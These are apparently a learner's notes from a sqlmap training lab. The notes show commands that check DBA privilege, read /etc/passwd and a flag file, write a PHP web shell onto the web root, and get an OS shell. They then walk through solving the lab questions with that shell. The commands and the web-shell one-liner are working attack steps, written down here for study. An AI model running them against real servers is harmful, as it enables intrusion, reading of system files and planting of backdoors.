SQLMap Essentials
OS Exploitation
File Read/Write
will check if you have DBA privilege
sqlmap -u "http://www.galapagh0st.com/case1.php?id=1" --is-dba
You do this to see if you have file read capabilities
If we have DBA privileges then we can read files.
--file-read "/etc/passwd"
Will make sqlmap read files
sqlmap -u "http://www.galapagh0st.com/?id=1" --file-read "/etc/passwd"
Writing Local Files
First we must prep our file we want to write onto the server something basic might be:
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Then we can use --file-write
and --file-dest
to send the file to the server.
sqlmap -u "http://www.galapagh0st.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
OS Command Execution
will allow us to execute a command
sqlmap -u "http://www.galapagh0st.com/?id=1" --os-shell
When you do this you might get an error not allowing us. If this is the case then we may want to pair it with --technique
sqlmap -u "http://www.example.com/?id=1" --os-shell --technique=E
NOTE: The above technique is Error-based
Questions: OS Exploitation
Question 1: Try to read the file in /var/www/html/flag.txt
sqlmap -u "" --file-read "/var/www/html/flag.txt"
Question 2: Build a shell and find the other flag
I built the hell from the example like so
echo '<?php system($_GET["cmd"]); ?>' > shell.php
Then I URL encoded and ran the command find / -type f -name "*flag*"
to find across the system all files with flag in the name
checked /var/www/html/flag.txt
but that was the flag we already used so grabbed /flag.txt
Got flag